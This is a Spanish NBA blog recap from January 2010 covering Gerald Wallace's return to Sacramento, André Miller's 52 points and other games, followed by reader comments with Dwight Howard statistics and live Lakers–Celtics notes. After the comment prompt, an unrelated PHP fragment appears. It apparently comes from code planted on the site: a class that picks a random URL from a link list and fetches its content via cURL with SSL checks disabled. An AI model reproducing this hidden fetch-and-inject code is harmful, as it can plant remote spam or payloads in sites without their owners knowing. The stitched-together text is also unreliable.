Minicrónica 30/01/2010

31 de January de 2010 por TheDeerHunter

Hubo un tiempo en que Gerald Wallace jugaba para los Kings. No jugaba mucho. Un tipo atlético, correcto defensor, sin excesivo margen de mejora, se decía. Contaba, si tenía suerte, con 10 minutitos para lucirse en un equipo donde había que ser muy bueno para destacar. Lo cierto es que entonces no tuvo demasiada suerte.

Ayer volvió a su antiguo pabellón. 6 años después. Destrozó a su ex-equipo con un 38-12 que apenas nos soprende. Este curso es una de las figuras de la liga. No ha disfrutado de una carrera tan fulgurante como la de LeBron o la de Melo. Quizás por eso tenga mayor mérito su temporada tan increíble. Los Bobcats, de su mano, firman el mejor mes de su historia. Por su parte Tyreke cayó lesionado. Habrá que esperar a conocer el alcance del a misma para ver si se pierde el fin de semana de las estrellas.

También hubo otro tiempo, no hace mucho, que André Miller era suplente de Steve Blake. Un tiempo en el que tenía pie y medio fuera de Portland, que no era del agrado de McMillan, que se llevaban a grito limpio públicamente. Ayer André le hizo un gran favor a Nate, anotando 52 puntacos contra los Mavs, en Dallas. Tampoco sabemos si esto es suficiente para convencer a Nate de que Miller es un excelente base para su proyecto. Se rumorea que no.

En Orlando les dieron un meneo considerable a los Hawks, y se colocan nada menos que segundos del Este. Deberíamos hacer un estudio sobre el balance de los Magic cuando Dwight Howard es el principal baluarte ofensivo. ¿Alguien se anima?

Dos derrotas seguidas de los Grizzles que les saca de playoffs en detrimento de los Hornets. Ni 50 puntos, 28 rebotes entre Marc&Zach, como tampoco la baja de CP3 evitó la catástrofe. Llegaron a ir ganando de 21 puntos. Darren Collison se marcó un partido casi milagroso. Gay horrible y Mayo demasiado fallón en los momentos clave. Que no se descentren ahora…

Los Heat echaron excesivamente de menos a Beasley. Warrick se puso las botas. Otro que se las puso fue Mike Miller frente a los Knicks. Tras su lesión está jugando de cine. Lo que pudo haber sido y no fue… el equipo de Washington. Que, por cierto, se comenta que podría ser pronto el destino de Rudy…

Comenta

5 comentarios a esta entrada

  1. sergio dice:
    #1

    Vamos a ver la influencia de Dwight Howard en su equipo ya que Deer lo ha “pedido”:

    Cuando ganan:
    31 victorias
    19,35 puntos y 13,77 rebotes
    25 dobles-dobles

    Cuando pierden:
    16 derrotas
    14,62 puntos y 12, 43 rebotes
    En solo 5 partidos lanzo 10 veces a canasta
    10 dobles-dobles

      Citar

  2. sergio dice:
    #2

    Ampliemosla un poco mas la estadistica…

    De las 31 victorias Howard fue el maximo anotador en 14 de ellas, en otras 5 estuvo a un maximo de 3 puntos del maximo anotador, y de las 12 restantes hizo al menos un doble doble en 10.

    De las 16 derrotas, Howard fue el maximo anotador en 5 de ellas, en ninguna estuvo a 3 puntos o menos del maximo anotador

      Citar

  3. Toni dice:
    #3

    Media parte, Lakers 47-52 Celtics.
    Rondo 11-3-10 ¿llegará al triple doble? El mejor por parte amarilla es un sorprendente Bynum con 14 puntos y 6 rebotes.
    A este resultado se ha llegado tras un aplastante segundo cuarto de los de Doc Rivers en el que han sumado prácticamente el doble de puntos que su oponente llegando a ganar de 10.
    Se reanuda el encuentro.

      Citar

  4. rojorob dice:
    #4

    Kobeeeeeeeeeeeee!!!

      Citar

  5. Toni dice:
    #5

    Una vez más los Lakers se burlaron de las malas sensaciones y a pesar de que la gente no hubiera dado un duro por ellos al final del segundo cuarto, tras un titubeante tercer periodo se repusieron en los momentos decisivos una vez más con una canasta decisiva de kobe aunque esta vez los verdes tuvieron su oportunidad para ganar el partido pero Ray Allen erró el buzzer-beater desde la linea de 3 y LA se llevó el partido jugando al tran-tran con un Gasol gris (por cierto la doble técnica señalada al español y a Wallace, ¿qué hace Gasol para que le piten técnica? ¿no apartarse?) y un kobe culminando una remontada iniciada por Shannon Brown (me lo podeis echar en cara pero en mi opinión él fue quien se mostró y anotó cuando el esférico quema en las manos). Destacar el gran partido (1o-2o-3er cuartos) de Bynum y el estratosférico encuentro de Rajon Rondo empañado posiblemente por esas 2(o3) pérdidas en el último periodo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>